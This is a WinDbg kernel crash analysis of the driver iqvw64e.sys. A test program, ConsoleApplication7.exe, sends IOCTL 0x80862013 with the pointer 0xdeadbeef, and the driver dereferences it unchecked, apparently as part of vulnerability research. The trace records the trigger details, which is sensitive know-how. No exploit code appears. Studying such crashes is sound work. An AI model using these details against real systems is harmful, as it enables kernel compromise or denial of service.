00000000`0021e9b0 00000000`773f4966 : 00000000`003331f0 00000000`00000000 00000000`774e2670 00000000`774b5978 : wow64!Wow64LdrpInitialize+0x42a
00000000`0021ef00 00000000`773f1937 : 00000000`00000000 00000000`773f4071 00000000`0021f4b0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3
00000000`0021f3f0 00000000`773dc34e : 00000000`0021f4b0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string'+0x28ff0
00000000`0021f460 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe
FOLLOWUP_IP:
iqvw64e+3fd2
fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx]
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: iqvw64e+3fd2
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: iqvw64e
IMAGE_NAME: iqvw64e.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 5284eac3
STACK_COMMAND: .cxr 0xfffff8800653a9c0 ; kb
FAILURE_BUCKET_ID: X64_0x3B_iqvw64e+3fd2
BUCKET_ID: X64_0x3B_iqvw64e+3fd2
Followup: MachineOwner
---------
3: kd> u fffff880`05a0bfd2
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx]
fffff880`05a0bfd5 488d0d14160000 lea rcx,[iqvw64e+0x55f0 (fffff880`05a0d5f0)]
fffff880`05a0bfdc e84fdfffff call iqvw64e+0x1f30 (fffff880`05a09f30)
fffff880`05a0bfe1 488b17 mov rdx,qword ptr [rdi]
fffff880`05a0bfe4 488d42ff lea rax,[rdx-1]
fffff880`05a0bfe8 4883f807 cmp rax,7
fffff880`05a0bfec 0f8718020000 ja iqvw64e+0x420a (fffff880`05a0c20a)
fffff880`05a0bff2 488d0d07c0ffff lea rcx,[iqvw64e (fffff880`05a08000)]
3: kd> !for_each_frame .frame /r @$Frame
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000
rip=fffff800036c3cb0 rsp=fffff88006539988 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=000000000000003b r13=0000000000000001
r14=0000000040000082 r15=0000000000000003
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!RtlpBreakWithStatusInstruction:
fffff800`036c3cb0 cc int 3
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
01 fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12
01 fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12
rax=0000000000000000 rbx=0000000000000003 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000
rip=fffff800037bba62 rsp=fffff88006539990 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=000000000000003b r13=0000000000000001
r14=0000000040000082 r15=0000000000000003
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiBugCheckDebugBreak+0x12:
fffff800`037bba62 eb75 jmp nt!KiBugCheckDebugBreak+0x89 (fffff800`037bbad9)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
02 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e
02 fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e
rax=0000000000000000 rbx=0000000000000065 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804c800060 rdi=00000000c0000000
rip=fffff800037bc84e rsp=fffff880065399f0 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=000000000000003b r13=0000000000000001
r14=0000000040000082 r15=0000000000000003
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KeBugCheck2+0x71e:
fffff800`037bc84e eb11 jmp nt!KeBugCheck2+0x731 (fffff800`037bc861)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
03 fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104
03 fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036cbf84 rsp=fffff8800653a0c0 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KeBugCheckEx+0x104:
fffff800`036cbf84 90 nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
04 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69
04 fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036cb429 rsp=fffff8800653a100 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiBugCheckDispatch+0x69:
fffff800`036cb429 90 nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
05 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c
05 fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036cad7c rsp=fffff8800653a240 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiSystemServiceHandler+0x7c:
fffff800`036cad7c b801000000 mov eax,1
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
06 fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd
06 fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036f6a4d rsp=fffff8800653a280 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!RtlpExecuteHandlerForException+0xd:
fffff800`036f6a4d 90 nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
07 fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415
07 fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415
rax=0000000000000000 rbx=fffff8000381a9e4 rcx=0000000000000003
rdx=000000000000008a rsi=fffff80003655000 rdi=0000000000000000
rip=fffff800036f5825 rsp=fffff8800653a2b0 rbp=0000000000000000
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff800036cb113 r13=fffff800038d8c54
r14=fffff800036cad00 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!RtlDispatchException+0x415:
fffff800`036f5825 0fba257fc51d0017 bt dword ptr [nt!NtGlobalFlag (fffff800`038d1dac)],17h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
08 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135
08 fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135
rax=0000000000000000 rbx=fffff8800653b168 rcx=0000000000000003
rdx=000000000000008a rsi=fffff8800653b210 rdi=00000000deadbeef
rip=fffff800037067b1 rsp=fffff8800653a990 rbp=fffff8800653aec0
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=fffff8800653a9c0 r13=000000000010001f
r14=fffff8800653b030 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiDispatchException+0x135:
fffff800`037067b1 84c0 test al,al
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
09 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2
09 fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2
rax=0000000000000000 rbx=0000000000000001 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff800036cb502 rsp=fffff8800653b030 rbp=fffff8800653b290
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiExceptionDispatch+0xc2:
fffff800`036cb502 488d8c2400010000 lea rcx,[rsp+100h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0a fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a
0a fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a
rax=0000000000000000 rbx=0000000000000001 rcx=0000000000000003
rdx=000000000000008a rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff800036ca07a rsp=fffff8800653b210 rbp=fffff8800653b290
r8=0000000000000065 r9=0000000000000000 r10=0000000000000000
r11=fffff88006539610 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiPageFault+0x23a:
fffff800`036ca07a 440f20c0 mov rax,cr8
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0b fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2
0b fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2
rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef
rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
iqvw64e+0x3fd2:
fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0c fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac
0c fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac
rax=0000f88005a696d1 rbx=fffffa804d1084d0 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=fffffa804d01e160
rip=fffff88005a091ac rsp=fffff8800653b8a0 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
iqvw64e+0x11ac:
fffff880`05a091ac 8bd8 mov ebx,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0d fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607
0d fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607
rax=0000f88005a696d1 rbx=fffffa804d1084d0 rcx=00000000deadbeef
rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=fffffa804d01e160
rip=fffff800039e80f7 rsp=fffff8800653b8d0 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001
r14=0000000000000001 r15=fffffa804aac7b00
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!IopXxxControlFile+0x607:
fffff800`039e80f7 448be0 mov r12d,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0e fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56
0e fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56
rax=0000f88005a696d1 rbx=fffffa804c800060 rcx=00000000deadbeef
rdx=0000000080862013 rsi=000000000021e8b8 rdi=fffff8800653ba88
rip=fffff800039e8956 rsp=fffff8800653ba00 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!NtDeviceIoControlFile+0x56:
fffff800`039e8956 4883c468 add rsp,68h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0f fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13
0f fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13
rax=0000f88005a696d1 rbx=fffffa804c800060 rcx=00000000deadbeef
rdx=0000000080862013 rsi=000000000021e8b8 rdi=fffff8800653ba88
rip=fffff800036cb113 rsp=fffff8800653ba70 rbp=fffff8800653bb60
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
nt!KiSystemServiceCopyEnd+0x13:
fffff800`036cb113 65ff042538220000 inc dword ptr gs:[2238h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
10 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9
10 00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000034
rip=0000000073b02e09 rsp=000000000021e898 rbp=00000000001dfe68
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
wow64cpu!CpupSyscallStub+0x9:
00000000`73b02e09 c3 ret
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
11 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31
11 00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000034
rip=0000000073b02944 rsp=000000000021e8a0 rbp=00000000001dfe68
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000007efdb000 r13=000000000021fd20
r14=000000000021e910 r15=0000000073b02450
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
wow64cpu!DeviceIoctlFileFault+0x31:
00000000`73b02944 488b4c2420 mov rcx,qword ptr [rsp+20h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
12 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa
12 00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000002 rdi=000000000021f4b0
rip=0000000073b7d286 rsp=000000000021e960 rbp=000000000021e9d0
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000000021fd20 r13=0000000000000000
r14=0000000000000001 r15=ffffffffffffffff
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
wow64!RunCpuSimulation+0xa:
00000000`73b7d286 eb00 jmp wow64!RunCpuSimulation+0xc (00000000`73b7d288)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
13 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a
13 00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000002 rdi=000000000021f4b0
rip=0000000073b7c69e rsp=000000000021e9b0 rbp=000000000021e9d0
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000000021fd20 r13=0000000000000000
r14=0000000000000001 r15=ffffffffffffffff
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
wow64!Wow64LdrpInitialize+0x42a:
00000000`73b7c69e cc int 3
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
14 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3
14 00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3
rax=0000f88005a696d1 rbx=0000000000000000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=00000000774e2670 rdi=00000000774b5978
rip=00000000773f4966 rsp=000000000021ef00 rbp=00000000773b0000
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=00000000774e2520 r13=0000000000000000
r14=00000000774e2650 r15=000000007efdf000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
ntdll!LdrpInitializeProcess+0x17e3:
00000000`773f4966 eb00 jmp ntdll!LdrpInitializeProcess+0x1c12 (00000000`773f4968)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
15 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0
15 00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0
rax=0000f88005a696d1 rbx=000000007efdf000 rcx=00000000deadbeef
rdx=0000000080862013 rsi=000000007efdb000 rdi=0000000000000000
rip=00000000773f1937 rsp=000000000021f3f0 rbp=0000000000000000
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=000000000021f4b0 r13=00000000773b0000
r14=0000000000000001 r15=000000007740a220
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
ntdll! ?? ::FNODOBFM::`string'+0x28ff0:
00000000`773f1937 89442430 mov dword ptr [rsp+30h],eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
16 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe
16 00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe
rax=0000f88005a696d1 rbx=000000000021f4b0 rcx=00000000deadbeef
rdx=0000000080862013 rsi=0000000000000000 rdi=0000000000000000
rip=00000000773dc34e rsp=000000000021f460 rbp=0000000000000000
r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000
r11=fffff8800653b898 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000286
ntdll!LdrInitializeThunk+0xe:
00000000`773dc34e b201 mov dl,1
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
3: kd> dd fffff8800653b8d0
fffff880`0653b8d0 80862013 00000000 0653bb60 fffff880
fffff880`0653b8e0 4d1084d0 fffffa80 4d01e160 fffffa80
fffff880`0653b8f0 746c6644 00000000 0653b928 fffff880
fffff880`0653b900 0653b968 fffff880 00000000 00000000
fffff880`0653b910 00000000 00000000 00000001 00000000
fffff880`0653b920 4c804e01 00000000 4d1084d0 fffffa80
fffff880`0653b930 00000000 00000000 00000000 00000000
fffff880`0653b940 4d01e160 fffffa80 76bdd0af 00000000
3: kd> !process 0 0
**** NT ACTIVE PROCESS DUMP ****
PROCESS fffffa8048f5f740
SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000
DirBase: 00187000 ObjectTable: fffff8a0000017f0 HandleCount: 535.
Image: System
.
.
.
PROCESS fffffa804d0f29e0
SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc
DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13.
Image: ConsoleApplication7.exe
.
.
.
3: kd> !handle fffffa804d0f29e0 7
PROCESS fffffa804d0f29e0
SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc
DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13.
Image: ConsoleApplication7.exe
Handle table at fffff8a016893450 with 13 entries in use
Invalid Handle: 0x4d0f29e0
3: kd> !process fffffa804d0f29e0 f
PROCESS fffffa804d0f29e0
SessionId: 1 Cid: 0d9c Peb: 7efdf000 ParentCid: 0afc
DirBase: 1aac4b000 ObjectTable: fffff8a016893450 HandleCount: 13.
Image: ConsoleApplication7.exe
VadRoot fffffa804a9eb220 Vads 30 Clone 0 Private 110. Modified 0. Locked 0.
DeviceMap fffff8a0022b5570
Token fffff8a01685d060
ElapsedTime 00:00:39.608
UserTime 00:00:00.000
KernelTime 00:00:00.000
QuotaPoolUsage[PagedPool] 20128
QuotaPoolUsage[NonPagedPool] 3360
Working Set Sizes (now,min,max) (510, 50, 345) (2040KB, 200KB, 1380KB)
PeakWorkingSetSize 510
VirtualSize 11 Mb
PeakVirtualSize 11 Mb
PageFaultCount 529
MemoryPriority BACKGROUND
BasePriority 8
CommitCharge 140
Job fffffa804d0fc080
THREAD fffffa804c800060 Cid 0d9c.0da0 Teb: 000000007efdb000 Win32Thread: 0000000000000000 RUNNING on processor 3
IRP List:
fffffa804d01e160: (0006,0118) Flags: 00060000 Mdl: 00000000
Not impersonating
DeviceMap fffff8a0022b5570
Owning Process fffffa804d0f29e0 Image: ConsoleApplication7.exe
Attached Process N/A Image: N/A
Wait Start TickCount 440956 Ticks: 0
Context Switch Count 31 IdealProcessor: 3
UserTime 00:00:00.000
KernelTime 00:00:00.000
*** WARNING: Unable to verify checksum for ConsoleApplication7.exe
*** ERROR: Module load completed but symbols could not be loaded for ConsoleApplication7.exe
Win32 Start Address ConsoleApplication7 (0x0000000000041354)
Stack Init fffff8800653bc70 Current fffff8800653b530
Base fffff8800653c000 Limit fffff88006536000 Call 0
Priority 11 BasePriority 8 UnusualBoost 0 ForegroundBoost 2 IoPriority 2 PagePriority 5
Child-SP RetAddr Call Site
fffff880`06539988 fffff800`037bba62 nt!RtlpBreakWithStatusInstruction
fffff880`06539990 fffff800`037bc84e nt!KiBugCheckDebugBreak+0x12
fffff880`065399f0 fffff800`036cbf84 nt!KeBugCheck2+0x71e
fffff880`0653a0c0 fffff800`036cb429 nt!KeBugCheckEx+0x104
fffff880`0653a100 fffff800`036cad7c nt!KiBugCheckDispatch+0x69
fffff880`0653a240 fffff800`036f6a4d nt!KiSystemServiceHandler+0x7c
fffff880`0653a280 fffff800`036f5825 nt!RtlpExecuteHandlerForException+0xd
fffff880`0653a2b0 fffff800`037067b1 nt!RtlDispatchException+0x415
fffff880`0653a990 fffff800`036cb502 nt!KiDispatchException+0x135
fffff880`0653b030 fffff800`036ca07a nt!KiExceptionDispatch+0xc2
fffff880`0653b210 fffff880`05a0bfd2 nt!KiPageFault+0x23a (TrapFrame @ fffff880`0653b210)
fffff880`0653b3a0 fffff880`05a091ac iqvw64e+0x3fd2
fffff880`0653b8a0 fffff800`039e80f7 iqvw64e+0x11ac
fffff880`0653b8d0 fffff800`039e8956 nt!IopXxxControlFile+0x607
fffff880`0653ba00 fffff800`036cb113 nt!NtDeviceIoControlFile+0x56
fffff880`0653ba70 00000000`73b02e09 nt!KiSystemServiceCopyEnd+0x13 (TrapFrame @ fffff880`0653bae0)
00000000`0021e898 00000000`73b02944 wow64cpu!CpupSyscallStub+0x9
00000000`0021e8a0 00000000`73b7d286 wow64cpu!DeviceIoctlFileFault+0x31
00000000`0021e960 00000000`73b7c69e wow64!RunCpuSimulation+0xa
00000000`0021e9b0 00000000`773f4966 wow64!Wow64LdrpInitialize+0x42a
00000000`0021ef00 00000000`773f1937 ntdll!LdrpInitializeProcess+0x17e3
00000000`0021f3f0 00000000`773dc34e ntdll! ?? ::FNODOBFM::`string'+0x28ff0
00000000`0021f460 00000000`00000000 ntdll!LdrInitializeThunk+0xe
3: kd> !irp fffffa804d01e160
Irp is active with 1 stacks 1 is current (= 0xfffffa804d01e230)
No Mdl: No System Buffer: Thread fffffa804c800060: Irp stack trace.
cmd flg cl Device File Completion-Context
>[ e, 0] 5 0 fffffa804aac7b00 fffffa804d1084d0 00000000-00000000
\FileSystem\iqvw64e
Args: 00000000 00000000 80862013 deadbeef
3: kd> !object fffffa804aac7b00
Object: fffffa804aac7b00 Type: (fffffa804900af30) Device
ObjectHeader: fffffa804aac7ad0 (new version)
HandleCount: 0 PointerCount: 2
Directory Object: fffff8a000010060 Name: Nal
3: kd> dt_IO_STACK_LOCATION 0xfffffa804d01e230
ntdll!_IO_STACK_LOCATION
+0x000 MajorFunction : 0xe ''
+0x001 MinorFunction : 0 ''
+0x002 Flags : 0x5 ''
+0x003 Control : 0 ''
+0x008 Parameters : <unnamed-tag>
+0x028 DeviceObject : 0xfffffa80`4aac7b00 _DEVICE_OBJECT
+0x030 FileObject : 0xfffffa80`4d1084d0 _FILE_OBJECT
+0x038 CompletionRoutine : (null)
+0x040 Context : (null)
3: kd> !devobj 0xfffffa80`4aac7b00 7
Device object (fffffa804aac7b00) is for:
Nal \FileSystem\iqvw64e DriverObject fffffa804b0f4d70
Current Irp 00000000 RefCount 1 Type 00008086 Flags 00000044
Dacl fffff9a10008c391 DevExt fffffa804aac7c50 DevObjExt fffffa804aac7c68
ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT
Characteristics (0000000000)
Device queue is not busy.
3: kd> !drvobj fffffa804b0f4d70 7
Driver object (fffffa804b0f4d70) is for:
\FileSystem\iqvw64e
Driver Extension List: (id , addr)
Device Object list:
fffffa804aac7b00
DriverEntry: fffff88005fda200 iqvw64e
DriverStartIo: 00000000
DriverUnload: fffff88005a09010 iqvw64e
AddDevice: 00000000
Dispatch routines:
[00] IRP_MJ_CREATE fffff88005a09090 iqvw64e+0x1090
[01] IRP_MJ_CREATE_NAMED_PIPE fffff800036b0e30 nt!IopInvalidDeviceRequest
[02] IRP_MJ_CLOSE fffff88005a090f0 iqvw64e+0x10f0
[03] IRP_MJ_READ fffff800036b0e30 nt!IopInvalidDeviceRequest
[04] IRP_MJ_WRITE fffff800036b0e30 nt!IopInvalidDeviceRequest
[05] IRP_MJ_QUERY_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest
[06] IRP_MJ_SET_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest
[07] IRP_MJ_QUERY_EA fffff800036b0e30 nt!IopInvalidDeviceRequest
[08] IRP_MJ_SET_EA fffff800036b0e30 nt!IopInvalidDeviceRequest
[09] IRP_MJ_FLUSH_BUFFERS fffff800036b0e30 nt!IopInvalidDeviceRequest
[0a] IRP_MJ_QUERY_VOLUME_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest
[0b] IRP_MJ_SET_VOLUME_INFORMATION fffff800036b0e30 nt!IopInvalidDeviceRequest
[0c] IRP_MJ_DIRECTORY_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest
[0d] IRP_MJ_FILE_SYSTEM_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest
[0e] IRP_MJ_DEVICE_CONTROL fffff88005a09150 iqvw64e+0x1150
[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL fffff800036b0e30 nt!IopInvalidDeviceRequest
